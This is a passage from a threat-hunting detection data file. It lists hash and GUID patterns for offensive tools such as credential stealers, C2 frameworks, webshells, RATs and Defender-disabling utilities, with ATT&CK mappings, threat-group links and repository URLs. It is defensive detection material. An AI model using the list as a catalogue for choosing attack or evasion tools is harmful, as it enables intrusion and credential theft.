#linux","N/A","5","","N/A","","","","32149" "*a00d934514ff5c2821c706fe33d7719980a6c520f152b4b3e6f8ac254e60f059*",".{0,1000}a00d934514ff5c2821c706fe33d7719980a6c520f152b4b3e6f8ac254e60f059.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32150" 
"*a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace*",".{0,1000}a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","32151" "*a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4*",".{0,1000}a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32152" "*A017568E-B62E-46B4-9557-15B278656365*",".{0,1000}A017568E\-B62E\-46B4\-9557\-15B278656365.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","32153" "*a01a3fe8fd6c3ff03908efd3321438df49365d0f64fa0a862419e31112936e3e*",".{0,1000}a01a3fe8fd6c3ff03908efd3321438df49365d0f64fa0a862419e31112936e3e.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential 
Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","32154" "*a02316234173d1704bae35ba6e194504049f563bd9aa51fef31850256e47ba9c*",".{0,1000}a02316234173d1704bae35ba6e194504049f563bd9aa51fef31850256e47ba9c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32155" "*a0383a13e4d392d598a445ef8bb82397cf6a86697f435a07d1d2019dd7feb78b*",".{0,1000}a0383a13e4d392d598a445ef8bb82397cf6a86697f435a07d1d2019dd7feb78b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32158" "*a03aaf164bf92c0d354c6fb6d6b6819a1a87bf465c803de6a0bc47261d3dfb4b*",".{0,1000}a03aaf164bf92c0d354c6fb6d6b6819a1a87bf465c803de6a0bc47261d3dfb4b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32159" "*a03d2b77a947deea62b87b2d30528a68729cce0614b0fe3aab9f280b9c2186eb*",".{0,1000}a03d2b77a947deea62b87b2d30528a68729cce0614b0fe3aab9f280b9c2186eb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32160" "*a0411b1b8ea64d342813eefa92371a40ea46ae27bcfca61b72a66950322ecd3f*",".{0,1000}a0411b1b8ea64d342813eefa92371a40ea46ae27bcfca61b72a66950322ecd3f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32162" "*a04da1ed67edcc4e11d49aeac5aeac4cb09dcdda5e2347a1ce77fa4a079482f1*",".{0,1000}a04da1ed67edcc4e11d49aeac5aeac4cb09dcdda5e2347a1ce77fa4a079482f1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32163" "*a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3*",".{0,1000}a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32165" 
"*a05461fa6d819d987203e7272cbf4e3eeb2879f9a69b27c4b5783cad1c4af29f*",".{0,1000}a05461fa6d819d987203e7272cbf4e3eeb2879f9a69b27c4b5783cad1c4af29f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32166" "*a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1*",".{0,1000}a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","32167" "*a05ffecbaa4ce2121ed7ea1a8181f34d41db9fe89e60b800e20eec22631f576d*",".{0,1000}a05ffecbaa4ce2121ed7ea1a8181f34d41db9fe89e60b800e20eec22631f576d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32170" "*a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142*",".{0,1000}a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","32171" "*a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2*",".{0,1000}a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","32172" "*a071416b90984cabb06774bb2177d004798c40b52ced3e9604af9997b82838d7*",".{0,1000}a071416b90984cabb06774bb2177d004798c40b52ced3e9604af9997b82838d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32173" "*a0767e6ca9109d8a0e82ac8abe1a1971e03de8d734905a09854244e9d316f73a*",".{0,1000}a0767e6ca9109d8a0e82ac8abe1a1971e03de8d734905a09854244e9d316f73a.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","32174" "*a076c96c9713804c8b2f26ffc09b931339be9f35227c749fb21fc9b574f97051*",".{0,1000}a076c96c9713804c8b2f26ffc09b931339be9f35227c749fb21fc9b574f97051.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 
- TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32175" "*a07dd62cf32175dc33bd37663dd3c89eef9413c805ad448e0e5a252b5cb5527f*",".{0,1000}a07dd62cf32175dc33bd37663dd3c89eef9413c805ad448e0e5a252b5cb5527f.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","32176" "*a07f5f82857dd9e0b02b4bb90783e028ff42e80fe8286dd2c8e983db138c3820*",".{0,1000}a07f5f82857dd9e0b02b4bb90783e028ff42e80fe8286dd2c8e983db138c3820.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#filehash","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","32177" "*a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196*",".{0,1000}a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32178" "*a080c293df2577cc210e889abb0be13126606f159ff4b2c88323dc753f7b2c2c*",".{0,1000}a080c293df2577cc210e889abb0be13126606f159ff4b2c88323dc753f7b2c2c.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","32179" "*a085122b8ad43a0b5ab96a6e4f96563a6bd844b45c00b9ff7b16c20c31f83e0e*",".{0,1000}a085122b8ad43a0b5ab96a6e4f96563a6bd844b45c00b9ff7b16c20c31f83e0e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32180" "*a08a45f16e52e6e3ec41d195cb1d6bd4ecfd748c47970bd522e9eae8b2575c0e*",".{0,1000}a08a45f16e52e6e3ec41d195cb1d6bd4ecfd748c47970bd522e9eae8b2575c0e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 
- T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32181" "*a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d*",".{0,1000}a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32182" "*a0a87215fd80d837f4825deccf302cb0fe7184219580988194789ecc1d65fc1a*",".{0,1000}a0a87215fd80d837f4825deccf302cb0fe7184219580988194789ecc1d65fc1a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32185" "*a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32*",".{0,1000}a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32186" "*a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0*",".{0,1000}a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","#filehash","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","32187" "*A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3*",".{0,1000}A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","32189" "*a0b465738c8244eae2e5b1c2574e621b044405cf9c3a574e44737ff08f9ea442*",".{0,1000}a0b465738c8244eae2e5b1c2574e621b044405cf9c3a574e44737ff08f9ea442.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO 
Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","32190" "*a0b87b7223b946059d61f7c955981ad9715a243f4b4116dd2dcb4352f9a02460*",".{0,1000}a0b87b7223b946059d61f7c955981ad9715a243f4b4116dd2dcb4352f9a02460.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","32191" "*a0bc5a42f2415d9efc221c2ffa9d2ef131351be75d4494f84fefff7bf5427323*",".{0,1000}a0bc5a42f2415d9efc221c2ffa9d2ef131351be75d4494f84fefff7bf5427323.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32192" "*a0bf933c2db4c92515bd4bcbfd5e7e07baca998423bdc11056f5271e3b93aef5*",".{0,1000}a0bf933c2db4c92515bd4bcbfd5e7e07baca998423bdc11056f5271e3b93aef5.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","32193" 
"*a0c0ea6786bf9ed2a243e6363409ba76b4f821e64d79e2587501050a46f3e326*",".{0,1000}a0c0ea6786bf9ed2a243e6363409ba76b4f821e64d79e2587501050a46f3e326.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","32194" "*a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b*",".{0,1000}a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32195" "*a0c82b68e731b303cbb379ca1bab45110c65edae85dd183bb66c55b0a7f3e9fe*",".{0,1000}a0c82b68e731b303cbb379ca1bab45110c65edae85dd183bb66c55b0a7f3e9fe.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","32197" "*a0d8d1a6146edb9a3e05ed28f1069322c094145fbd27e1864f891d962db6be54*",".{0,1000}a0d8d1a6146edb9a3e05ed28f1069322c094145fbd27e1864f891d962db6be54.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32199" "*a0dc0f46eb7ed3f8bd2fa9e1ff1b6e9beb1921bc63e7c72abba2d4a30bec7871*",".{0,1000}a0dc0f46eb7ed3f8bd2fa9e1ff1b6e9beb1921bc63e7c72abba2d4a30bec7871.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32200" "*A0E096FB-3AEF-41B5-A67B-BD90D2FEBBFC*",".{0,1000}A0E096FB\-3AEF\-41B5\-A67B\-BD90D2FEBBFC.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32201" "*a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23*",".{0,1000}a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","#filehash","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","32202" 
"*a0e6607e98251fd8dc2d2129d45c473611b9980ffdbff5738ebfb18c440a69fb*",".{0,1000}a0e6607e98251fd8dc2d2129d45c473611b9980ffdbff5738ebfb18c440a69fb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32203" "*a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739*",".{0,1000}a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32204" "*a0e70901c1b7a25d6bcba8c7dac024c7fdd9641f8a687ae39deb7217f4c09411*",".{0,1000}a0e70901c1b7a25d6bcba8c7dac024c7fdd9641f8a687ae39deb7217f4c09411.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32205" "*A0E7B538-F719-47B8-8BE4-A82C933F5753*",".{0,1000}A0E7B538\-F719\-47B8\-8BE4\-A82C933F5753.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black 
Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#GUIDproject","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","32206" "*A0F044C5-D910-4720-B082-58824E372281*",".{0,1000}A0F044C5\-D910\-4720\-B082\-58824E372281.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#GUIDproject","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","32208" "*a0f3b76ea770d4e850a7e3904efe22f53d348cf40767e279d873ffee5ae89a6e*",".{0,1000}a0f3b76ea770d4e850a7e3904efe22f53d348cf40767e279d873ffee5ae89a6e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 